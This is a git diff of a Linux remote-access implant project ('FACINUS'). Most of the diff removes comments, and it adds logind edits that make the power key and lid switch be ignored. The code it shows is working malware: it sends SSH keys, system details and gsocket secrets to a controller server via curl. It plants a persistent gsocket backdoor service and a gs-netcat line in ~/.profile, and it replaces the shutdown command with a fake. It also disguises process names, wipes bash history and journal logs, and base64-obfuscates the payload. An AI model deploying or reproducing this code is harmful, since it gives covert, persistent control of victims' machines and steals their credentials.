diff --git a/scripts/deploy/y b/scripts/deploy/y index 151f7f5..faef2cd 100755 --- a/scripts/deploy/y +++ b/scripts/deploy/y @@ -1,19 +1,12 @@ #!/bin/bash -# FACINUS Remote Access Client -# This script sets up remote access capabilities on the target system -# ================= CONFIGURATION ================= SERVER_URL="SERVER_PLACEHOLDER" LOG_ENDPOINT="$SERVER_URL/deployment/log_receiver.php" AUTH_TOKEN="TOKEN_PLACEHOLDER" -VERSION="1.1.0" -# ================================================ -# Create temporary directory TEMP_DIR=$(mktemp -d) trap 'rm -rf "$TEMP_DIR"' EXIT -# ------- UTILITY FUNCTIONS ------- log_cmd() { local cmd="$1" local desc="$2" @@ -23,7 +16,6 @@ log_cmd() { echo "$ $cmd" >> "$log_file" echo "--------------------------------------------" >> "$log_file" - # Execute command and capture output and status local output output=$(eval "$cmd" 2>&1) local status=$? @@ -63,7 +55,6 @@ send_logs() { local sysinfo=$(get_system_info) local hostname=$(hostname) - # Submit logs to the server curl -s -X POST "$LOG_ENDPOINT" \ -F "auth_token=$AUTH_TOKEN" \ -F "hostname=$hostname" \ @@ -75,7 +66,6 @@ send_logs() { } detect_package_manager() { - # Detect the system's package manager if command -v apt &> /dev/null; then echo "apt" elif command -v dnf &> /dev/null; then @@ -91,7 +81,6 @@ detect_package_manager() { fi } -# ------- INSTALLATION FUNCTIONS ------- install_ssh() { local log_file="$TEMP_DIR/ssh_install.log" touch "$log_file" @@ -135,18 +124,15 @@ install_ssh() { ;; esac - # Get SSH key if it exists if [ -f ~/.ssh/id_rsa.pub ]; then send_logs "$log_file" "$(cat ~/.ssh/id_rsa.pub)" "ssh_key" else - # Try to create a new key if it doesn't exist log_cmd "ssh-keygen -t rsa -N '' -f ~/.ssh/id_rsa" "Generating SSH key" "$log_file" if [ -f ~/.ssh/id_rsa.pub ]; then send_logs "$log_file" "$(cat ~/.ssh/id_rsa.pub)" "ssh_key" fi fi - # Send SSH configuration local ssh_port=$(grep -E "^Port " /etc/ssh/sshd_config | awk '{print $2}') [ -z "$ssh_port" ] && ssh_port=22 @@ -161,7 +147,6 @@ setup_wol() { echo "[*] Setting up Wake-on-LAN..." - # Install ethtool if needed local pkg_manager=$(detect_package_manager) case "$pkg_manager" in apt) @@ -189,7 +174,6 @@ setup_wol() { ;; esac - # Get the primary interface local interface=$(ip route | grep default | awk '{print $5}' | head -n1) if [ -z "$interface" ]; then @@ -197,13 +181,10 @@ setup_wol() { return 1 fi - # Check current WoL status if ethtool "$interface" | grep -q "Wake-on: g"; then echo "[+] Wake-on-LAN is already enabled on $interface." - # Try to enable WoL log_cmd "sudo ethtool -s $interface wol g" "Enabling Wake-on-LAN" "$log_file" - # Create persistent configuration cat > "$TEMP_DIR/wol.service" << EOF [Unit] Description=Enable Wake-on-LAN on $interface @@ -223,9 +204,7 @@ EOF log_cmd "sudo systemctl enable wol.service" "Enabling WoL service" "$log_file" log_cmd "sudo systemctl start wol.service" "Starting WoL service" "$log_file" - # Get MAC address for WoL local mac=$(ip link show $interface | grep -E 'link/ether' | awk '{print $2}') - send_logs "$log_file" "{\"interface\":\"$interface\",\"mac\":\"$mac\"}" "wol_config" echo "[+] Wake-on-LAN configured for interface $interface (MAC: $mac)." @@ -241,7 +220,6 @@ setup_fake_poweroff() { echo "[*] Setting up fake poweroff..." - # Create the fake poweroff script cat > "$TEMP_DIR/fake-poweroff.sh" << 'EOF' #!/bin/bash # This script intercepts poweroff/shutdown commands and fakes a shutdown @@ -315,6 +293,9 @@ sudo mv "$TEMP_DIR/shutdown-wrapper" /usr/sbin/shutdown EOF log_cmd "sudo bash $TEMP_DIR/fake-poweroff.sh" "Installing fake poweroff scripts" "$log_file" + log_cmd "sudo sed -i 's/^#HandlePowerKey=poweroff/HandlePowerKey=ignore/' /etc/systemd/logind.conf" "Disabling pressing power key" "$log_file" + log_cmd "sudo sed -i 's/^#HandlePowerKeyLongPress=poweroff/HandlePowerKeyLongPress=ignore/' /etc/systemd/logind.conf" "Disabling long press power key" "$log_file" + log_cmd "sudo sed -i 's/^#HandleLidSwitch=suspend/HandleLidSwitch=ignore/' /etc/systemd/logind.conf" "Disabling lid switch" "$log_file" send_logs "$log_file" "Fake poweroff installed" "fake_poweroff" @@ -328,7 +309,6 @@ install_gsocket() { echo "[*] Installing gsocket for remote access..." - # Install dependencies local pkg_manager=$(detect_package_manager) case "$pkg_manager" in apt) @@ -349,18 +329,15 @@ install_gsocket() { ;; esac - # build gsocket if ! command -v gs-netcat &>/dev/null; then log_cmd "wget -q -O $TEMP_DIR/gsocket_linux-$(uname -m).tar.gz \"https://github.com/hackerschoice/gsocket/archive/refs/tags/v1.4.43.tar.gz\"" "Download gsocket" "$log_file" log_cmd "cd $TEMP_DIR && tar xfz gsocket_linux-*.tar.gz" "Extracting gsocket" "$log_file" log_cmd "cd $TEMP_DIR/gsocket-* && ./bootstrap && ./configure && make && sudo make install" "Building and install gsocket" "$log_file" fi - # Generate a unique secret local gs_root_secret=$(gs-netcat -g) local gs_user_secret=$(gs-netcat -g) - # Create systemd service for persistent connection cat > "$TEMP_DIR/gsocket-backdoor.service" << EOF [Unit] Description=GSocket Remote Access @@ -383,17 +360,12 @@ EOF log_cmd "sudo systemctl enable gsocket-backdoor.service" "Enabling gsocket service" "$log_file" log_cmd "sudo systemctl start gsocket-backdoor.service" "Starting gsocket service" "$log_file" - # Also put a gs-netcat backdoor in user's .profile log_cmd "echo 'killall -0 gs-netcat 2>/dev/null || (GSOCKET_ARGS=\"-s $gs_user_secret -liqD\" SHELL=/bin/bash exec -a bash gs-netcat)' >> ~/.profile" "Add backdoor to .profile" "$log_file" log_cmd "source ~/.profile" "Reloading .profile" "$log_file" - # Create connection instructions cat > "$TEMP_DIR/gsocket_info.txt" << EOF GSocket Connection Information ============================= -Root secret: $gs_root_secret -User secret: $gs_user_secret - Connect as root: gs-netcat -s $gs_root_secret -i Connect as user: gs-netcat -s $gs_user_secret -i ============================= @@ -404,7 +376,7 @@ EOF send_logs "$log_file" "$gs_user_secret" "gsocket_user_secret" send_logs "$log_file" "$(cat $TEMP_DIR/gsocket_info.txt)" "gsocket_info" - echo "[+] GSocket installed. You can connect using: gs-netcat -s $gs_root_secret" + echo "[+] GSocket installed. You can connect using: gs-netcat -s $gs_root_secret -i" } setup_stealth() { @@ -412,47 +384,18 @@ setup_stealth() { touch "$log_file" echo "[*] Setting up stealth mode..." - - # Hide processes by creating a systemd unit with hidden name - cat > "$TEMP_DIR/_.service" << 'EOF' -[Unit] -Description=System Update Service -After=network.target - -[Service] -Type=simple -ExecStart=/bin/bash -c 'while true; do sleep 3600; done' -Restart=always -RestartSec=10 -StandardOutput=null -StandardError=null - -[Install] -WantedBy=default.target -EOF - - sudo mv "$TEMP_DIR/_.service" /etc/systemd/system/ - log_cmd "sudo systemctl daemon-reload" "Reloading systemd" "$log_file" - log_cmd "sudo systemctl enable _.service" "Enabling hidden service" "$log_file" - log_cmd "sudo systemctl start _.service" "Starting hidden service" "$log_file" - - # Set up process name obfuscation script cat > "$TEMP_DIR/obfuscate.sh" << 'EOF' #!/bin/bash -# This script allows running commands with an obfuscated process name -# Function to run a command with an obfuscated name obfuscate_run() { local fake_name="$1" shift exec -a "$fake_name" "$@" } -# Install the function to user's bashrc if ! grep -q "obfuscate_run" ~/.bashrc; then cat >> ~/.bashrc << 'EOT' -# Obfuscation function obfuscate_run() { local fake_name="$1" shift @@ -461,7 +404,6 @@ obfuscate_run() { EOT fi -# Create helper aliases if ! grep -q "alias stealthy" ~/.bashrc; then cat >> ~/.bashrc << 'EOT' alias stealthy='obfuscate_run "[khugepageds]"' @@ -469,13 +411,11 @@ alias hidden='obfuscate_run "[migration/0]"' EOT fi -# Install a cron job to clear bash history periodically (crontab -l 2>/dev/null; echo "0 * * * * cat /dev/null > ~/.bash_history") | crontab - EOF log_cmd "bash $TEMP_DIR/obfuscate.sh" "Setting up process obfuscation" "$log_file" - # Create log rotation to clean service logs cat > "$TEMP_DIR/clean-logs.service" << 'EOF' [Unit] Description=Clean System Logs @@ -489,7 +429,6 @@ ExecStart=/bin/bash -c 'journalctl --vacuum-time=1d' [Install] WantedBy=default.target EOF - sudo mv "$TEMP_DIR/clean-logs.service" /etc/systemd/system/ cat > "$TEMP_DIR/clean-logs.timer" << 'EOF' @@ -515,30 +454,20 @@ EOF echo "[+] Stealth mode configured." } -# ------- MAIN EXECUTION ------- main() { local log_file="$TEMP_DIR/main.log" touch "$log_file" echo "[*] Beginning setup..." echo "[*] Target system: $(hostname) ($(whoami))" - sudo apt install -y curl jq &> /dev/null || true - - # Send initial system info send_logs "$log_file" "$(get_system_info)" "system_info" - - # Install components based on flags install_ssh setup_wol setup_fake_poweroff install_gsocket setup_stealth - echo "[+] Setup complete." echo "[+] All logs and credentials have been sent to the server." } - -# Run the main function main - diff --git a/scripts/detect_system.sh b/scripts/detect_system.sh index cf2f1fb..b8a9ee2 100755 --- a/scripts/detect_system.sh +++ b/scripts/detect_system.sh @@ -1,16 +1,12 @@ #!/bin/bash -# Detect system distro and architecture detect_system() { - # Detect architecture ARCH=$(uname -m) - # Detect distribution if [ -f /etc/os-release ]; then . /etc/os-release DISTRO_NAME=${ID,,} # Convert to lowercase - # Check if it's an Arch-based distro for arch_distro in "${ARCH_DISTROS[@]}"; do if [[ "$DISTRO_NAME" == *"$arch_distro"* ]]; then DISTRO="arch" @@ -18,7 +14,6 @@ detect_system() { fi done - # Check if it's a Debian-based distro for deb_distro in "${DEB_DISTROS[@]}"; do if [[ "$DISTRO_NAME" == *"$deb_distro"* ]]; then DISTRO="debian" @@ -26,7 +21,6 @@ detect_system() { fi done - # Check if it's an RPM-based distro for rpm_distro in "${RPM_DISTROS[@]}"; do if [[ "$DISTRO_NAME" == *"$rpm_distro"* ]]; then DISTRO="redhat" @@ -34,7 +28,6 @@ detect_system() { fi done - # If we can't determine the distro family, just use the ID DISTRO="$DISTRO_NAME" elif [ -f /etc/arch-release ]; then DISTRO="arch" diff --git a/scripts/generate_scripts.sh b/scripts/generate_scripts.sh index 96f17f8..d5abb80 100755 --- a/scripts/generate_scripts.sh +++ b/scripts/generate_scripts.sh @@ -6,14 +6,11 @@ generate_client_scripts() { echo "Generating client deployment scripts..." generate_main_client_script - generate_obfuscated_script - generate_presets } generate_main_client_script() { - # Copy the script to the server cp "$DEPLOY_DIR/y" "$SERVER_ROOT" # Replace placeholders in the script @@ -26,7 +23,6 @@ generate_main_client_script() { generate_obfuscated_script() { echo "Creating obfuscated version of the client script..." - # Base64 encode the script to obfuscate it base64 -w0 < "$DEPLOY_DIR/y" > "$DEPLOY_DIR/y.b64" cp "$DEPLOY_DIR/x" "$SERVER_ROOT/" @@ -39,7 +35,6 @@ generate_obfuscated_script() { generate_presets() { echo "Creating installation presets..." - # Replace placeholders for preset in "$DEPLOY_DIR/minimal" "$DEPLOY_DIR/full" "$DEPLOY_DIR/quiet"; do sed -i "s|SERVER_PLACEHOLDER|$SERVER_IP|g" "$preset" cp "$preset" "$SERVER_ROOT/"